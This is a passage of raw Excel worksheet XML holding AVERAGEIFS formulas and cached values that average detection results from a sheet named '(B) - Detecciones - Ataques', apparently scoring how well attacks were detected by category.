        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="AM194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="AN194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="AO194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="AP194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="AR194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="AS194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="AT194" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="AU194" s="271"/>
      <c r="AV194" s="271"/>
      <c r="AW194" s="271"/>
      <c r="AX194" s="271"/>
      <c r="AY194" s="271"/>
      <c r="AZ194" s="271"/>
      <c r="BA194" s="271"/>
      <c r="BB194" s="271"/>
      <c r="BC194" s="271"/>
      <c r="BD194" s="271"/>
      <c r="BE194" s="271"/>
      <c r="BF194" s="271"/>
      <c r="BG194" s="271"/>
      <c r="BH194" s="271"/>
      <c r="BI194" s="271"/>
      <c r="BJ194" s="271"/>
      <c r="BK194" s="271"/>
      <c r="BL194" s="271"/>
      <c r="BM194" s="271"/>
      <c r="BN194" s="271"/>
      <c r="BO194" s="271"/>
      <c r="BP194" s="271"/>
      <c r="BQ194" s="271"/>
      <c r="BR194" s="271"/>
      <c r="BS194" s="271"/>
      <c r="BT194" s="271"/>
      <c r="BU194" s="271"/>
      <c r="BV194" s="271"/>
      <c r="BW194" s="271"/>
      <c r="BX194" s="271"/>
      <c r="BY194" s="271"/>
      <c r="BZ194" s="271"/>
      <c r="CA194" s="271"/>
      <c r="CB194" s="271"/>
      <c r="CC194" s="271"/>
      <c r="CD194" s="271"/>
      <c r="CE194" s="271"/>
      <c r="CF194" s="271"/>
      <c r="CG194" s="271"/>
      <c r="CH194" s="271"/>
      <c r="CI194" s="271"/>
      <c r="CJ194" s="271"/>
      <c r="CK194" s="271"/>
      <c r="CL194" s="271"/>
      <c r="CM194" s="271"/>
      <c r="CN194" s="271"/>
      <c r="CO194" s="271"/>
      <c r="CP194" s="271"/>
      <c r="CQ194" s="271"/>
      <c r="CR194" s="271"/>
      <c r="CS194" s="271"/>
      <c r="CT194" s="271"/>
      <c r="CU194" s="271"/>
      <c r="CV194" s="271"/>
      <c r="CW194" s="271"/>
      <c r="CX194" s="271"/>
      <c r="CY194" s="271"/>
      <c r="CZ194" s="271"/>
      <c r="DA194" s="271"/>
      <c r="DB194" s="271"/>
      <c r="DC194" s="271"/>
      <c r="DD194" s="271"/>
      <c r="DE194" s="271"/>
      <c r="DF194" s="271"/>
      <c r="DG194" s="271"/>
      <c r="DH194" s="271"/>
      <c r="DI194" s="271"/>
      <c r="DJ194" s="271"/>
      <c r="DK194" s="271"/>
    </row>
    <row r="195">
      <c r="K195" s="173"/>
      <c r="N195" s="173"/>
      <c r="Q195" s="271"/>
      <c r="R195" s="510"/>
      <c r="S195" s="510"/>
      <c r="T195" s="510"/>
      <c r="U195" s="510"/>
      <c r="V195" s="510"/>
      <c r="W195" s="510"/>
      <c r="X195" s="271"/>
      <c r="Y195" s="271"/>
      <c r="Z195" s="271"/>
      <c r="AA195" s="271"/>
      <c r="AB195" s="271"/>
      <c r="AC195" s="271"/>
      <c r="AD195" s="271"/>
      <c r="AE195" s="271"/>
      <c r="AF195" s="271"/>
      <c r="AG195" s="271"/>
      <c r="AH195" s="352" t="s">
        <v>2242</v>
      </c>
      <c r="AI195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AK195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AL195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AM195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AN195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AO195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AP195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AR195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AS195" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AT195" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="AU195" s="271"/>
      <c r="AV195" s="271"/>
      <c r="AW195" s="271"/>
      <c r="AX195" s="271"/>
      <c r="AY195" s="271"/>
      <c r="AZ195" s="271"/>
      <c r="BA195" s="271"/>
      <c r="BB195" s="271"/>
      <c r="BC195" s="271"/>
      <c r="BD195" s="271"/>
      <c r="BE195" s="271"/>
      <c r="BF195" s="271"/>
      <c r="BG195" s="271"/>
      <c r="BH195" s="271"/>
      <c r="BI195" s="271"/>
      <c r="BJ195" s="271"/>
      <c r="BK195" s="271"/>
      <c r="BL195" s="271"/>
      <c r="BM195" s="271"/>
      <c r="BN195" s="271"/>
      <c r="BO195" s="271"/>
      <c r="BP195" s="271"/>
      <c r="BQ195" s="271"/>
      <c r="BR195" s="271"/>
      <c r="BS195" s="271"/>
      <c r="BT195" s="271"/>
      <c r="BU195" s="271"/>
      <c r="BV195" s="271"/>
      <c r="BW195" s="271"/>
      <c r="BX195" s="271"/>
      <c r="BY195" s="271"/>
      <c r="BZ195" s="271"/>
      <c r="CA195" s="271"/>
      <c r="CB195" s="271"/>
      <c r="CC195" s="271"/>
      <c r="CD195" s="271"/>
      <c r="CE195" s="271"/>
      <c r="CF195" s="271"/>
      <c r="CG195" s="271"/>
      <c r="CH195" s="271"/>
      <c r="CI195" s="271"/>
      <c r="CJ195" s="271"/>
      <c r="CK195" s="271"/>
      <c r="CL195" s="271"/>
      <c r="CM195" s="271"/>
      <c r="CN195" s="271"/>
      <c r="CO195" s="271"/>
      <c r="CP195" s="271"/>
      <c r="CQ195" s="271"/>
      <c r="CR195" s="271"/>
      <c r="CS195" s="271"/>
      <c r="CT195" s="271"/>
      <c r="CU195" s="271"/>
      <c r="CV195" s="271"/>
      <c r="CW195" s="271"/>
      <c r="CX195" s="271"/>
      <c r="CY195" s="271"/>
      <c r="CZ195" s="271"/>
      <c r="DA195" s="271"/>
      <c r="DB195" s="271"/>
      <c r="DC195" s="271"/>
      <c r="DD195" s="271"/>
      <c r="DE195" s="271"/>
      <c r="DF195" s="271"/>
      <c r="DG195" s="271"/>
      <c r="DH195" s="271"/>
      <c r="DI195" s="271"/>
      <c r="DJ195" s="271"/>
      <c r="DK195" s="271"/>
    </row>
    <row r="196">
      <c r="K196" s="173"/>
      <c r="N196" s="173"/>
      <c r="Q196" s="271"/>
      <c r="R196" s="510"/>
      <c r="S196" s="510"/>
      <c r="T196" s="510"/>
      <c r="U196" s="510"/>
      <c r="V196" s="510"/>
      <c r="W196" s="510"/>
      <c r="X196" s="271"/>
      <c r="Y196" s="271"/>
      <c r="Z196" s="271"/>
      <c r="AA196" s="271"/>
      <c r="AB196" s="271"/>
      <c r="AC196" s="271"/>
      <c r="AD196" s="271"/>
      <c r="AE196" s="271"/>
      <c r="AF196" s="271"/>
      <c r="AG196" s="271"/>
      <c r="AH196" s="352" t="s">
        <v>1282</v>
      </c>
      <c r="AI196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS196" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT196" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU196" s="271"/>
      <c r="AV196" s="271"/>
      <c r="AW196" s="271"/>
      <c r="AX196" s="271"/>
      <c r="AY196" s="271"/>
      <c r="AZ196" s="271"/>
      <c r="BA196" s="271"/>
      <c r="BB196" s="271"/>
      <c r="BC196" s="271"/>
      <c r="BD196" s="271"/>
      <c r="BE196" s="271"/>
      <c r="BF196" s="271"/>
      <c r="BG196" s="271"/>
      <c r="BH196" s="271"/>
      <c r="BI196" s="271"/>
      <c r="BJ196" s="271"/>
      <c r="BK196" s="271"/>
      <c r="BL196" s="271"/>
      <c r="BM196" s="271"/>
      <c r="BN196" s="271"/>
      <c r="BO196" s="271"/>
      <c r="BP196" s="271"/>
      <c r="BQ196" s="271"/>
      <c r="BR196" s="271"/>
      <c r="BS196" s="271"/>
      <c r="BT196" s="271"/>
      <c r="BU196" s="271"/>
      <c r="BV196" s="271"/>
      <c r="BW196" s="271"/>
      <c r="BX196" s="271"/>
      <c r="BY196" s="271"/>
      <c r="BZ196" s="271"/>
      <c r="CA196" s="271"/>
      <c r="CB196" s="271"/>
      <c r="CC196" s="271"/>
      <c r="CD196" s="271"/>
      <c r="CE196" s="271"/>
      <c r="CF196" s="271"/>
      <c r="CG196" s="271"/>
      <c r="CH196" s="271"/>
      <c r="CI196" s="271"/>
      <c r="CJ196" s="271"/>
      <c r="CK196" s="271"/>
      <c r="CL196" s="271"/>
      <c r="CM196" s="271"/>
      <c r="CN196" s="271"/>
      <c r="CO196" s="271"/>
      <c r="CP196" s="271"/>
      <c r="CQ196" s="271"/>
      <c r="CR196" s="271"/>
      <c r="CS196" s="271"/>
      <c r="CT196" s="271"/>
      <c r="CU196" s="271"/>
      <c r="CV196" s="271"/>
      <c r="CW196" s="271"/>
      <c r="CX196" s="271"/>
      <c r="CY196" s="271"/>
      <c r="CZ196" s="271"/>
      <c r="DA196" s="271"/>
      <c r="DB196" s="271"/>
      <c r="DC196" s="271"/>
      <c r="DD196" s="271"/>
      <c r="DE196" s="271"/>
      <c r="DF196" s="271"/>
      <c r="DG196" s="271"/>
      <c r="DH196" s="271"/>
      <c r="DI196" s="271"/>
      <c r="DJ196" s="271"/>
      <c r="DK196" s="271"/>
    </row>
    <row r="197">
      <c r="K197" s="173"/>
      <c r="N197" s="173"/>
      <c r="Q197" s="271"/>
      <c r="R197" s="510"/>
      <c r="S197" s="510"/>
      <c r="T197" s="510"/>
      <c r="U197" s="510"/>
      <c r="V197" s="510"/>
      <c r="W197" s="510"/>
      <c r="X197" s="271"/>
      <c r="Y197" s="271"/>
      <c r="Z197" s="271"/>
      <c r="AA197" s="271"/>
      <c r="AB197" s="271"/>
      <c r="AC197" s="271"/>
      <c r="AD197" s="271"/>
      <c r="AE197" s="271"/>
      <c r="AF197" s="271"/>
      <c r="AG197" s="271"/>
      <c r="AH197" s="352" t="s">
        <v>429</v>
      </c>
      <c r="AI197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS197" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT197" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU197" s="271"/>
      <c r="AV197" s="271"/>
      <c r="AW197" s="271"/>
      <c r="AX197" s="271"/>
      <c r="AY197" s="271"/>
      <c r="AZ197" s="271"/>
      <c r="BA197" s="271"/>
      <c r="BB197" s="271"/>
      <c r="BC197" s="271"/>
      <c r="BD197" s="271"/>
      <c r="BE197" s="271"/>
      <c r="BF197" s="271"/>
      <c r="BG197" s="271"/>
      <c r="BH197" s="271"/>
      <c r="BI197" s="271"/>
      <c r="BJ197" s="271"/>
      <c r="BK197" s="271"/>
      <c r="BL197" s="271"/>
      <c r="BM197" s="271"/>
      <c r="BN197" s="271"/>
      <c r="BO197" s="271"/>
      <c r="BP197" s="271"/>
      <c r="BQ197" s="271"/>
      <c r="BR197" s="271"/>
      <c r="BS197" s="271"/>
      <c r="BT197" s="271"/>
      <c r="BU197" s="271"/>
      <c r="BV197" s="271"/>
      <c r="BW197" s="271"/>
      <c r="BX197" s="271"/>
      <c r="BY197" s="271"/>
      <c r="BZ197" s="271"/>
      <c r="CA197" s="271"/>
      <c r="CB197" s="271"/>
      <c r="CC197" s="271"/>
      <c r="CD197" s="271"/>
      <c r="CE197" s="271"/>
      <c r="CF197" s="271"/>
      <c r="CG197" s="271"/>
      <c r="CH197" s="271"/>
      <c r="CI197" s="271"/>
      <c r="CJ197" s="271"/>
      <c r="CK197" s="271"/>
      <c r="CL197" s="271"/>
      <c r="CM197" s="271"/>
      <c r="CN197" s="271"/>
      <c r="CO197" s="271"/>
      <c r="CP197" s="271"/>
      <c r="CQ197" s="271"/>
      <c r="CR197" s="271"/>
      <c r="CS197" s="271"/>
      <c r="CT197" s="271"/>
      <c r="CU197" s="271"/>
      <c r="CV197" s="271"/>
      <c r="CW197" s="271"/>
      <c r="CX197" s="271"/>
      <c r="CY197" s="271"/>
      <c r="CZ197" s="271"/>
      <c r="DA197" s="271"/>
      <c r="DB197" s="271"/>
      <c r="DC197" s="271"/>
      <c r="DD197" s="271"/>
      <c r="DE197" s="271"/>
      <c r="DF197" s="271"/>
      <c r="DG197" s="271"/>
      <c r="DH197" s="271"/>
      <c r="DI197" s="271"/>
      <c r="DJ197" s="271"/>
      <c r="DK197" s="271"/>
    </row>
    <row r="198">
      <c r="K198" s="173"/>
      <c r="N198" s="173"/>
      <c r="Q198" s="271"/>
      <c r="R198" s="510"/>
      <c r="S198" s="510"/>
      <c r="T198" s="510"/>
      <c r="U198" s="510"/>
      <c r="V198" s="510"/>
      <c r="W198" s="510"/>
      <c r="X198" s="271"/>
      <c r="Y198" s="271"/>
      <c r="Z198" s="271"/>
      <c r="AA198" s="271"/>
      <c r="AB198" s="271"/>
      <c r="AC198" s="271"/>
      <c r="AD198" s="271"/>
      <c r="AE198" s="271"/>
      <c r="AF198" s="271"/>
      <c r="AG198" s="271"/>
      <c r="AH198" s="352" t="s">
        <v>912</v>
      </c>
      <c r="AI198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS198" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT198" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU198" s="271"/>
      <c r="AV198" s="271"/>
      <c r="AW198" s="271"/>
      <c r="AX198" s="271"/>
      <c r="AY198" s="271"/>
      <c r="AZ198" s="271"/>
      <c r="BA198" s="271"/>
      <c r="BB198" s="271"/>
      <c r="BC198" s="271"/>
      <c r="BD198" s="271"/>
      <c r="BE198" s="271"/>
      <c r="BF198" s="271"/>
      <c r="BG198" s="271"/>
      <c r="BH198" s="271"/>
      <c r="BI198" s="271"/>
      <c r="BJ198" s="271"/>
      <c r="BK198" s="271"/>
      <c r="BL198" s="271"/>
      <c r="BM198" s="271"/>
      <c r="BN198" s="271"/>
      <c r="BO198" s="271"/>
      <c r="BP198" s="271"/>
      <c r="BQ198" s="271"/>
      <c r="BR198" s="271"/>
      <c r="BS198" s="271"/>
      <c r="BT198" s="271"/>
      <c r="BU198" s="271"/>
      <c r="BV198" s="271"/>
      <c r="BW198" s="271"/>
      <c r="BX198" s="271"/>
      <c r="BY198" s="271"/>
      <c r="BZ198" s="271"/>
      <c r="CA198" s="271"/>
      <c r="CB198" s="271"/>
      <c r="CC198" s="271"/>
      <c r="CD198" s="271"/>
      <c r="CE198" s="271"/>
      <c r="CF198" s="271"/>
      <c r="CG198" s="271"/>
      <c r="CH198" s="271"/>
      <c r="CI198" s="271"/>
      <c r="CJ198" s="271"/>
      <c r="CK198" s="271"/>
      <c r="CL198" s="271"/>
      <c r="CM198" s="271"/>
      <c r="CN198" s="271"/>
      <c r="CO198" s="271"/>
      <c r="CP198" s="271"/>
      <c r="CQ198" s="271"/>
      <c r="CR198" s="271"/>
      <c r="CS198" s="271"/>
      <c r="CT198" s="271"/>
      <c r="CU198" s="271"/>
      <c r="CV198" s="271"/>
      <c r="CW198" s="271"/>
      <c r="CX198" s="271"/>
      <c r="CY198" s="271"/>
      <c r="CZ198" s="271"/>
      <c r="DA198" s="271"/>
      <c r="DB198" s="271"/>
      <c r="DC198" s="271"/>
      <c r="DD198" s="271"/>
      <c r="DE198" s="271"/>
      <c r="DF198" s="271"/>
      <c r="DG198" s="271"/>
      <c r="DH198" s="271"/>
      <c r="DI198" s="271"/>
      <c r="DJ198" s="271"/>
      <c r="DK198" s="271"/>
    </row>
    <row r="199">
      <c r="K199" s="173"/>
      <c r="N199" s="173"/>
      <c r="Q199" s="271"/>
      <c r="R199" s="510"/>
      <c r="S199" s="510"/>
      <c r="T199" s="510"/>
      <c r="U199" s="510"/>
      <c r="V199" s="510"/>
      <c r="W199" s="510"/>
      <c r="X199" s="271"/>
      <c r="Y199" s="271"/>
      <c r="Z199" s="271"/>
      <c r="AA199" s="271"/>
      <c r="AB199" s="271"/>
      <c r="AC199" s="271"/>
      <c r="AD199" s="271"/>
      <c r="AE199" s="271"/>
      <c r="AF199" s="271"/>
      <c r="AG199" s="271"/>
      <c r="AH199" s="352" t="s">
        <v>1837</v>
      </c>
      <c r="AI199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AK199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AL199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AM199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="AN199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AO199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AP199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="AR199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AS199" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AT199" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="AU199" s="271"/>
      <c r="AV199" s="271"/>
      <c r="AW199" s="271"/>
      <c r="AX199" s="271"/>
      <c r="AY199" s="271"/>
      <c r="AZ199" s="271"/>
      <c r="BA199" s="271"/>
      <c r="BB199" s="271"/>
      <c r="BC199" s="271"/>
      <c r="BD199" s="271"/>
      <c r="BE199" s="271"/>
      <c r="BF199" s="271"/>
      <c r="BG199" s="271"/>
      <c r="BH199" s="271"/>
      <c r="BI199" s="271"/>
      <c r="BJ199" s="271"/>
      <c r="BK199" s="271"/>
      <c r="BL199" s="271"/>
      <c r="BM199" s="271"/>
      <c r="BN199" s="271"/>
      <c r="BO199" s="271"/>
      <c r="BP199" s="271"/>
      <c r="BQ199" s="271"/>
      <c r="BR199" s="271"/>
      <c r="BS199" s="271"/>
      <c r="BT199" s="271"/>
      <c r="BU199" s="271"/>
      <c r="BV199" s="271"/>
      <c r="BW199" s="271"/>
      <c r="BX199" s="271"/>
      <c r="BY199" s="271"/>
      <c r="BZ199" s="271"/>
      <c r="CA199" s="271"/>
      <c r="CB199" s="271"/>
      <c r="CC199" s="271"/>
      <c r="CD199" s="271"/>
      <c r="CE199" s="271"/>
      <c r="CF199" s="271"/>
      <c r="CG199" s="271"/>
      <c r="CH199" s="271"/>
      <c r="CI199" s="271"/>
      <c r="CJ199" s="271"/>
      <c r="CK199" s="271"/>
      <c r="CL199" s="271"/>
      <c r="CM199" s="271"/>
      <c r="CN199" s="271"/>
      <c r="CO199" s="271"/>
      <c r="CP199" s="271"/>
      <c r="CQ199" s="271"/>
      <c r="CR199" s="271"/>
      <c r="CS199" s="271"/>
      <c r="CT199" s="271"/>
      <c r="CU199" s="271"/>
      <c r="CV199" s="271"/>
      <c r="CW199" s="271"/>
      <c r="CX199" s="271"/>
      <c r="CY199" s="271"/>
      <c r="CZ199" s="271"/>
      <c r="DA199" s="271"/>
      <c r="DB199" s="271"/>
      <c r="DC199" s="271"/>
      <c r="DD199" s="271"/>
      <c r="DE199" s="271"/>
      <c r="DF199" s="271"/>
      <c r="DG199" s="271"/>
      <c r="DH199" s="271"/>
      <c r="DI199" s="271"/>
      <c r="DJ199" s="271"/>
      <c r="DK199" s="271"/>
    </row>
    <row r="200">
      <c r="K200" s="173"/>
      <c r="N200" s="173"/>
      <c r="Q200" s="271"/>
      <c r="R200" s="510"/>
      <c r="S200" s="510"/>
      <c r="T200" s="510"/>
      <c r="U200" s="510"/>
      <c r="V200" s="510"/>
      <c r="W200" s="510"/>
      <c r="X200" s="271"/>
      <c r="Y200" s="271"/>
      <c r="Z200" s="271"/>
      <c r="AA200" s="271"/>
      <c r="AB200" s="271"/>
      <c r="AC200" s="271"/>
      <c r="AD200" s="271"/>
      <c r="AE200" s="271"/>
      <c r="AF200" s="271"/>
      <c r="AG200" s="271"/>
      <c r="AH200" s="352" t="s">
        <v>1510</v>
      </c>
      <c r="AI200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="AJ200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="AK200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="AL200" s="518">
